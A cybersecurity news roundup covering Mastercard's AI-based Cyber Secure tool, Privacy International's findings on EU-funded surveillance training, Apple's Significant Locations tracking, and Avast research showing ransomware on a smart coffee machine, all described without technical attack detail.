Mastercard introduces AI-powered cybersecurity

Cybersecurity remains one of the hottest topics around. While browsing today’s media I noted one article said that cyber attacks rose by 250% during the pandemic. Apparently it was the perfect time for scammers and hackers to wield their weapons.

This may be one of the things that prompted Mastercard to launch Cyber Secure, “a first-of-its-kind, AI-powered suite of tools that allows banks to assess cyber risk across their ecosystem and prevent potential breaches.”

 

It all comes down to the fact that the digital economy is expanding rapidly and is more complex. Alongside this positive news, comes the less appealing revelation that the growth creates a vulnerability that some are delighted to take advantage of.  For example,it is estimated that one business will fall victim to a ransomware attack every 11 seconds by next year.

 

Ajay Bhalla, president, Cyber & Intelligence, Mastercard said:

“The world today faces a $5.2 trillion cyber breach problem. This is one of the biggest threats to consumer trust. At Mastercard, we aim to stay ahead of fraudsters and to continually evolve and enhance our protection of cyber environments for our bank and merchant customers. With Cyber Secure, we have a suite of AI-powered cyber capabilities that allows us to do just that, ensuring trust across every experience, for businesses and consumers.” 

 

Cyber Secure will enable banks “to continuously monitor and track their cyber posture,” writes Polly Harrison. It will allow banks to be more proactive in managing and preventing data compromise, as well as protecting the integrity of the payment ecosystem and consumer data. It should also, of course, prevent financial loss caused by attacks.

Mastercard has based its new product on the AI capapbilities of RickRecon, which it purchased in 2020. It uses advanced AI for risk assessment, which evaluates multiple public and proprietary data sources and checks it against 40 security and infrastructure criteria.

Harrison writes, “In 2019, Mastercard saved stakeholders $20bn of fraud through its AI-enabled cyber systems,” so it is to be hoped that Cyber Secure prevents even more theft in 2021 and beyond.

How governments snoop on us

Non-profit Privacy International (PI) has revealed how the EU funds surveillance techniques using development aid programmes. These include training security forces in non-EU countries. Privacy International and other campaigners are demanding reform of EU aid in respect of this, demanding they “do not facilitate the use of surveillance which violates fundamental rights.”

PI learnt of the situation following the public release of documents that revealed:

  • Police and security agencies in Africa and the Balkans are trained with the EU’s support in spying on internet and social media users and using controversial surveillance techniques and tools
  • EU bodies are training and equipping border and migration authorities in non-member countries with surveillance tools
  • Civipol, a well-connected French security company, is developing mass biometric systems with EU aid funds in Western Africa in order to stop migration and facilitate deportations without adequate risk assessments.

In an article, Thomas Brewster discusses how CEPOL, the EU’s law enforcement training agency, taught security personnel in Europe and Africa, on how to use malware to access citizen’s phones and monitor social media. As PI points out, some of the countries that EU aid for this type of surveillance was given to, are those with a history of human rights abuses. Which is why PI and other organisations want to press the EU to change its funding programme.

Edin Omanovic, advocacy director of Privacy International, said: ““Instead of helping people who face daily threats from unaccountable surveillance agencies, including activists, journalists and people just looking for better lives, this ‘aid’ risks doing the very opposite.”

He added, “The EU as the world’s largest provider of aid and a powerful force for change… failure to reform is a betrayal not just of the purpose of aid and the people it’s supposed to benefit, but of the EU’s own values.”

In the EU parliament, MEP Markéta Gregorová, who works in the EU group on surveillance reforms, commented: “We just made it much harder to export cyber-surveillance and it is unacceptable that at the same time our own law enforcement agencies are training dictators to spy on their people and even recommend surveillance software. This is unacceptable and irreconcilable with our values and screams for reform.”

According to some of the training materials obtained by PI, there are those promoting iPhone hacking tools like GrayKey. For example, in a training session for Morocco, the participants were told that by using Graykey and Axiom together, security personnel would be able to “grab the Apple keychain from within the iPhone, granting it access to apps and the data within.” Morocco is a good example of the reason PI is so determined to change the EU aid programme, as the country has for some time been accused of targeting iPhones to track the activity of journalists and all kinds of activists. In another example, found in the documents, Spain’s Policia Nacional, a CEPOL partner, trained authorities in Bosnia and Herzegovina on using malware to remotely control devices. The files also show how CEPOL and European police are encouraging foreign governments to spy on social networks.

It is unfortunate that the PI revelations come at exactly the same time as the EU announced it would be curtailing the export of particular surveillance tools, which they claim is a move that supports global human rights, saying, “We have set an important example for other democracies to follow.”

PI’s response to the statement was that it “critically undermined by the fact that EU agencies are themselves secretly promoting the use of techniques which pose serious threats.”

It would appear that while the European Parliament and Council are legislating to stop surveillance abuses, CEPOL and European police are doing the opposite. This kind of situation where the left hand apparently doesn’t know what the right is doing, is exactly one where those who wish to undermine the EU will look for ammunition. It must get its house in order on this important issue.

iPhone location tracking is a security risk

There is no such thing as absolute privacy or security for smartphone users. The only way you can have control is by not storing information that you want to keep a secret on your phone.

As Apple CEO Tim Cook said last year, “The people who track on the internet know a lot more about you than if somebody’s looking in your window, a lot more.” It should make us pause to think about how we use our phones.

Apple, according to Zak Doffman, believes it is “privacy protector-in-chief,” and iOS14 is intended to demonstrate its privacy-first approach. Doffman points to the ongoing battle between Apple and Facebook over ad tracking, remarking, “Exploitation of our personal data has become a commodity traded between the world’s largest organisations.”

However, iOS users were surprised when Apple explained its location tracking. It is an invasive feature, and as Doffman says, “a perfect illustration of just because you can, doesn’t mean you should.”

Were you aware that the location tracking builds up a data collection of all the places you have visited, including times, dates, the type of transport you used to get there and how long you stayed at the location.

Jake Moore of ESET commented, “significant locations is one of those features hidden within the privacy section which many users tend not to be familiar with. I cannot think of a positive or useful reason why Apple would include this feature on any of their devices.”

If you check out the data repository on your iPhone, you will likely see that it stores certain places, times and dates, and that is because it is trying to work out if this might be important for a photo memory or a calendar entry. But do you really want this? I agree with Doffman when he says, “I don’t need my phone tracking every single location I visit and deciding which it deems significant to save me a few seconds of effort.”

According to Apple, the device wants to “learn the places that are significant to you.” However, you can breathe a small sigh of relief when you learn that the “data is end-to-end encrypted and cannot be read by Apple.”

What this illustrates is that even though the data is encrypted, you still don’t have absolute control over the security of your iPhone. John Opdenakker, an information security expert, said, “While Apple’s encryption and device-only restriction certainly reduces the security and privacy risks, I personally switched this feature off because it doesn’t offers real benefits and just feels creepy.”  He added, “What worries me from a privacy perspective is that this feature is enabled by default and that the setting is hidden away such that the average user probably doesn’t find it.”

Don’t forget that you can turn off other location-based services on your Apple device, such as ads and alerts. Want to know where to find them all? Just go to “Settings-Privacy-Location Services-System Services-Significant Locations.”

Would you pay a ransom for your cup of joe?

If you’re a gadget-loving person, and you enjoy your coffee, then there is a very good chance that you have a coffee machine. However, I don’t suppose you’ve ever thought it might be a cybersecurity threat.

Davey Winder, a tech journalist, points caffeine addicts in the direction of a new report by security research firm Avasti, which as discovered, “smart coffee machines can not only be hacked but can be hacked with ransomware.”

One of Avasti’s senior researchers, Martin Hron, wrote in a recent blog, “The fresh smell of ransomed coffee”, about how he proved a myth was true when he turned a “coffee maker into a dangerous machine asking for ransom by modifying the maker’s firmware.”

Proving a myth

Hron goes on to say:”I was asked to prove a myth, call it a suspicion, that the threat to IoT devices is not just to access them via a weak router or exposure to the internet, but that an IoT device itself is vulnerable and can be easily owned without owning the network or the router.”

What Hron discovered was that the coffee machine acted as a Wi-Fi access point when switched on. This then established an unencrypted, unsecured connection to a companion app. From that point he was able to explore the machine’s firmware update mechanism, finding that because the updates were unencrypted, no authentication code was required. Hron, behaving as a hacker would, then reverse engineered the firmware stored in the machine’s Android app.

Crypto or coffee?

Perhaps you’ll smile at what Hron tried to do next. He attempted to turn the coffee machine into a cryptocurrency mining machine, something he found would be possible, although also impossibly slow due to the CPU speed. What he did instead, was perhaps more dramatic. Imagine your coffee machine starts making an ear-splitting noise and there is nothing you can do to stop it. Hron created a noise malfunction that could only be stopped by paying a ransom, or pulling the plug on your morning coffee forever.

A noisy attack

He effectively produced a ransomware attack that nobody could ignore. Winder writes, “The trigger for the attack was the command that connects the machine to the network, and the payload some malicious code that “renders the coffee maker unusable and asks for a ransom.”

Hrom also went a bit further. He inserted code that permanently turned on the hotbed and water heater as well as the coffee grinder.

If you have a coffee machine connected to the Internet, you are probably safe, but it’s useful to know that these machines can be attacked. But I do wonder, would you pay the ransom to have your smart coffee machine return to normal breakfast duties, or would you pull the plug and go back to an old skool method of brewing up a cup of joe?